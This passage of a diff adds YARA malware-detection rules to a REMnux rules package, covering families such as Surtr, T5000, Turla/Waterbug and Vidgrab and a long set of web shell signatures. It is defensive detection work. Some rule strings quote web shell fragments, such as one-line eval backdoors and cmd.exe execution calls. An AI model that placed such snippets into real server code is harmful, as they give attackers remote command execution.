+		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
+
+		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+		$patch_SamIRetrieveMultiplePrimaryCredential  = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Stealer.yara remnux-rules-0.0.4/yara.old/Stealer.yara
--- remnux-rules-0.0.3/yara.old/Stealer.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Stealer.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule universal_1337_stealer_serveur : Stealer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="24/02/2013"
+		description="Universal 1337 Stealer Serveur"
+		
+	strings:
+		$signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/
+		$signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/
+		$signature3={46 54 50 7E} /*FTP~*/
+		$signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/
+		
+	condition:
+		$signature1 and $signature2 or $signature3 and $signature4
+}
diff -Nru remnux-rules-0.0.3/yara.old/Surtr.yara remnux-rules-0.0.4/yara.old/Surtr.yara
--- remnux-rules-0.0.3/yara.old/Surtr.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Surtr.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,138 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RSharedStrings : Surtr Family {
+	meta:
+		description = "identifiers for remote and gmremote"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "nView_DiskLoydb" wide
+		$ = "nView_KeyLoydb" wide
+		$ = "nView_skins" wide
+		$ = "UsbLoydb" wide
+		$ = "%sBurn%s" wide
+		$ = "soul" wide
+
+	condition:
+		any of them
+
+}
+
+rule RemoteStrings : Remote Variant Surtr Family {
+	meta:
+		description = "indicators for remote.dll - surtr stage 2"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "\x00Remote.dll\x00"
+		$ = "\x00CGm_PlugBase::"
+		$ = "\x00ServiceMain\x00_K_H_K_UH\x00"
+		$ = "\x00_Remote_\x00" wide
+	condition:
+		any of them
+}
+
+rule GmRemoteStrings : GmRemote Variant Family Surtr {
+	meta:
+		description = "identifiers for gmremote: surtr stage 2"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "\x00x86_GmRemote.dll\x00"
+		$ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
+		$ = "\x00GmShutPoint\x00"
+		$ = "\x00GmRecvPoint\x00"
+		$ = "\x00GmInitPoint\x00"
+		$ = "\x00GmVerPoint\x00"
+		$ = "\x00GmNumPoint\x00"
+		$ = "_Gt_Remote_" wide
+		$ = "%sBurn\\workdll.tmp" wide
+	
+	condition:
+		any of them
+
+}
+
+
+rule GmRemote : Family Surtr Variant GmRemote {
+	meta:
+		description = "identifier for gmremote"
+		author = "Katie Kleemola"
+		last_updated = "07-25-2014"
+	
+	condition:
+		RSharedStrings and GmRemoteStrings
+}
+
+rule Remote : Family Surtr Variant Remote {
+	meta:
+		description = "identifier for remote"
+		author = "Katie Kleemola"
+		last_updated = "07-25-2014"
+	
+	condition:
+		RSharedStrings and RemoteStrings
+}
+
+rule SurtrStrings : Surtr Family {	
+	meta: 
+		author = "Katie Kleemola"
+		description = "Strings for Surtr"
+		last_updated = "2014-07-16"
+
+	strings:
+		$ = "\x00soul\x00"
+		$ = "\x00InstallDll.dll\x00"
+		$ = "\x00_One.dll\x00"
+		$ = "_Fra.dll"
+		$ = "CrtRunTime.log"
+		$ = "Prod.t"
+		$ = "Proe.t"
+		$ = "Burn\\"
+		$ = "LiveUpdata_Mem\\"
+
+	condition:
+		any of them
+
+}
+
+rule SurtrCode : Surtr Family {
+	meta: 
+		author = "Katie Kleemola"
+		description = "Code features for Surtr Stage1"
+		last_updated = "2014-07-16"
+	
+	strings:
+		//decrypt config
+		$ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
+		//if Burn folder name is not in strings
+		$ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
+		//mov char in _Fire
+		$ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
+
+	condition:
+		any of them
+
+}
+
+rule Surtr : Family {
+	meta:
+		author = "Katie Kleemola"
+		description = "Rule for Surtr Stage One"
+		last_updated = "2014-07-16"
+
+	condition:
+		SurtrStrings or SurtrCode
+
+}
+
+
+
diff -Nru remnux-rules-0.0.3/yara.old/T5000.yara remnux-rules-0.0.4/yara.old/T5000.yara
--- remnux-rules-0.0.3/yara.old/T5000.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/T5000.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule T5000Strings : T5000 Family
+{
+    meta:
+        description = "T5000 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-26"
+        
+    strings:
+        $ = "_tmpR.vbs"
+        $ = "_tmpg.vbs"
+        $ = "Dtl.dat" wide ascii
+        $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
+        $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
+        $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
+        $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
+        $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
+        $ = "A59CF429-D0DD-4207-88A1-04090680F714"
+        $ = "utd_CE31" wide ascii
+        $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
+        $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
+        $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
+        $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
+        
+    condition:
+       any of them
+}
+
+rule T5000 : Family
+{
+    meta:
+        description = "T5000"
+        author = "Seth Hardy"
+        last_modified = "2014-06-26"
+        
+    condition:
+        T5000Strings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Turla.yara remnux-rules-0.0.4/yara.old/Turla.yara
--- remnux-rules-0.0.3/yara.old/Turla.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Turla.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_turla_dll 
+{
+    meta:
+        description = "Symantec Waterbug Attack - Trojan Turla DLL"
+        author = "Symantec Security Response"
+        date = "22.01.2015"
+        reference = "http://t.co/rF35OaAXrl"   
+
+    strings:
+        $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/
+   
+    condition:
+        pe.exports("ee") and $a
+}
diff -Nru remnux-rules-0.0.3/yara.old/Urausy.yara remnux-rules-0.0.4/yara.old/Urausy.yara
--- remnux-rules-0.0.3/yara.old/Urausy.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Urausy.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule urausy_skype_dat {
+	meta:
+		author = "AlienVault Labs"
+		description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
+	strings:
+		$a = "skype.dat" ascii wide
+		$b = "skype.ini" ascii wide
+		$win1 = "CreateWindow"
+		$win2 = "YIWEFHIWQ" ascii wide
+		$desk1 = "CreateDesktop"
+		$desk2 = "MyDesktop" ascii wide
+	condition:
+		$a and $b and (all of ($win*) or all of ($desk*))
+}
diff -Nru remnux-rules-0.0.3/yara.old/Vidgrab.yara remnux-rules-0.0.4/yara.old/Vidgrab.yara
--- remnux-rules-0.0.3/yara.old/Vidgrab.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Vidgrab.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule VidgrabCode : Vidgrab Family 
+{
+    meta:
+        description = "Vidgrab code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
+        // add eax, ecx; xor byte ptr [eax], ??h; inc ecx
+        $xorloop = { 03 C1 80 30 (66 | 58) 41 }
+        $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
+        
+    condition:
+        all of them
+}
+
+rule VidgrabStrings : Vidgrab Family
+{
+    meta:
+        description = "Vidgrab Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $ = "IDI_ICON5" wide ascii
+        $ = "starter.exe"
+        $ = "wmifw.exe"
+        $ = "Software\\rar"
+        $ = "tmp092.tmp"
+        $ = "temp1.exe"
+        
+    condition:
+       3 of them
+}
+
+rule Vidgrab : Family
+{
+    meta:
+        description = "Vidgrab"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    condition:
+        VidgrabCode or VidgrabStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Warp.yara remnux-rules-0.0.4/yara.old/Warp.yara
--- remnux-rules-0.0.3/yara.old/Warp.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Warp.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WarpCode : Warp Family 
+{
+    meta:
+        description = "Warp code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // character replacement
+        $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
+    
+    condition:
+        any of them
+}
+
+rule WarpStrings : Warp Family
+{
+    meta:
+        description = "Warp Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $ = "/2011/n325423.shtml?"
+        $ = "wyle"
+        $ = "\\~ISUN32.EXE"
+
+    condition:
+       any of them
+}
+
+rule Warp : Family
+{
+    meta:
+        description = "Warp"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        WarpCode or WarpStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Waterbug.yara remnux-rules-0.0.4/yara.old/Waterbug.yara
--- remnux-rules-0.0.3/yara.old/Waterbug.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Waterbug.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,100 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_wipbot_2013_core_PDF {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings:
+		$PDF = "%PDF-"
+		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/ 
+		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
+	condition:
+		($PDF at 0) and #a > 150 and #b > 200
+}
+
+rule WaterBug_wipbot_2013_dll {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"		
+	strings:
+		$string1 = "/%s?rank=%s"
+		$string2 = "ModuleStart\x00ModuleStop\x00start"
+		$string3 = "1156fd22-3443-4344-c4ffff"
+		//read file... error..
+		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
+	condition:
+		2 of them
+}
+
+rule WaterBug_wipbot_2013_core {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"			
+	strings:
+		$mz = "MZ"
+		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
+		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
+		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
+	condition:
+		$mz at 0 and (($code1 or $code2) or ($code3 and $code4))
+}
+
+rule WaterBug_turla_dropper {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings: 
+		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
+		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
+	condition: 
+		all of them
+}
+
+rule WaterBug_fa_malware { 
+	meta: 
+		description = "Symantec Waterbug Attack - FA malware variant"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings:
+		$mz = "MZ"
+		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
+		$string2 = "d:\\proj\\cn\\fa64\\"
+		$string3 = "sengoku_Win32.sys\x00"
+		$string4 = "rk_ntsystem.c"
+		$string5 = "\\uroboros\\"
+		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
+	condition:
+		($mz at 0) and (any of ($string*))
+}
+
+
+rule WaterBug_sav {
+	meta: 
+		description = "Symantec Waterbug Attack - SAV Malware"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl" 	
+	strings:
+		$mz = "MZ"
+		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
+		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
+		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
+		$code2 =  { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
+	condition:
+		($mz at 0) and (($code1a or $code1b or $code1c) and $code2) 
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Webshell-shell.yara remnux-rules-0.0.4/yara.old/Webshell-shell.yara
--- remnux-rules-0.0.3/yara.old/Webshell-shell.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Webshell-shell.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,7971 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Weevely_Webshell {
+	meta:
+		description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"
+		author = "Florian Roth"
+		reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"
+		date = "2014/12/14"
+		score = 60
+	strings:
+		$php = "<?php" ascii
+		$s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii
+		$s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii
+		$s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii
+		$s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii
+	condition:
+		$php at 0 and all of ($s*) and filesize > 570 and filesize < 800
+}
+
+rule webshell_h4ntu_shell_powered_by_tsoi_ {
+	meta:
+		description = "Web Shell - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+	strings:
+		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
+		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
+		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
+		$s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"
+	condition:
+		all of them
+}
+rule webshell_PHP_sql {
+	meta:
+		description = "Web Shell - file sql.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2cf20a207695bbc2311a998d1d795c35"
+	strings:
+		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
+		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+	condition:
+		all of them
+}
+rule webshell_PHP_a {
+	meta:
+		description = "Web Shell - file a.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e3b461f7464d81f5022419d87315a90d"
+	strings:
+		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
+		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
+		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+	condition:
+		2 of them
+}
+rule webshell_iMHaPFtp_2 {
+	meta:
+		description = "Web Shell - file iMHaPFtp.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+	strings:
+		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
+		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
+	condition:
+		1 of them
+}
+rule webshell_Jspspyweb {
+	meta:
+		description = "Web Shell - file Jspspyweb.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4e9be07e95fff820a9299f3fb4ace059"
+	strings:
+		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
+		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
+	condition:
+		all of them
+}
+rule webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+	meta:
+		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+	strings:
+		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
+		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
+	condition:
+		1 of them
+}
+rule webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend {
+	meta:
+		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
+		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+	condition:
+		1 of them
+}
+rule webshell_phpshell_2_1_pwhash {
+	meta:
+		description = "Web Shell - file pwhash.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ba120abac165a5a30044428fac1970d8"
+	strings:
+		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
+		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
+	condition:
+		1 of them
+}
+rule webshell_PHPRemoteView {
+	meta:
+		description = "Web Shell - file PHPRemoteView.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+	strings:
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+	condition:
+		1 of them
+}
+rule webshell_jsp_12302 {
+	meta:
+		description = "Web Shell - file 12302.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a3930518ea57d899457a62f372205f7f"
+	strings:
+		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_guo {
+	meta:
+		description = "Web Shell - file guo.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9e69a8f499c660ee0b4796af14dc08f0"
+	strings:
+		$s0 = "<?php ($www= $_POST['ice'])!"
+		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
+	condition:
+		1 of them
+}
+rule webshell_PHP_redcod {
+	meta:
+		description = "Web Shell - file redcod.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
+	strings:
+		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+	condition:
+		all of them
+}
+rule webshell_remview_fix {
+	meta:
+		description = "Web Shell - file remview_fix.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
+	strings:
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
+	condition:
+		1 of them
+}
+rule webshell_asp_cmd {
+	meta:
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "895ca846858c315a3ff8daa7c55b3119"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+	condition:
+		1 of them
+}
+rule webshell_php_sh_server {
+	meta:
+		description = "Web Shell - file server.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 50
+		hash = "d87b019e74064aa90e2bb143e5e16cfa"
+	strings:
+		$s0 = "eval(getenv('HTTP_CODE'));" fullword
+	condition:
+		all of them
+}
+rule webshell_PH_Vayv_PH_Vayv {
+	meta:
+		description = "Web Shell - file PH Vayv.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
+		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
+	condition:
+		1 of them
+}
+rule webshell_caidao_shell_ice {
+	meta:
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "6560b436d3d3bb75e2ef3f032151d139"
+	strings:
+		$s0 = "<%eval request(\"ice\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_cihshell_fix {
+	meta:
+		description = "Web Shell - file cihshell_fix.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3823ac218032549b86ee7c26f10c4cb5"
+	strings:
+		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
+		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
+	condition:
+		1 of them
+}
+rule webshell_asp_shell {
+	meta:
+		description = "Web Shell - file shell.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e63f5a96570e1faf4c7b8ca6df750237"
+	strings:
+		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+	condition:
+		all of them
+}
+rule webshell_Private_i3lue {
+	meta:
+		description = "Web Shell - file Private-i3lue.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
+	strings:
+		$s8 = "case 15: $image .= \"\\21\\0\\"
+	condition:
+		all of them
+}
+rule webshell_php_up {
+	meta:
+		description = "Web Shell - file up.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
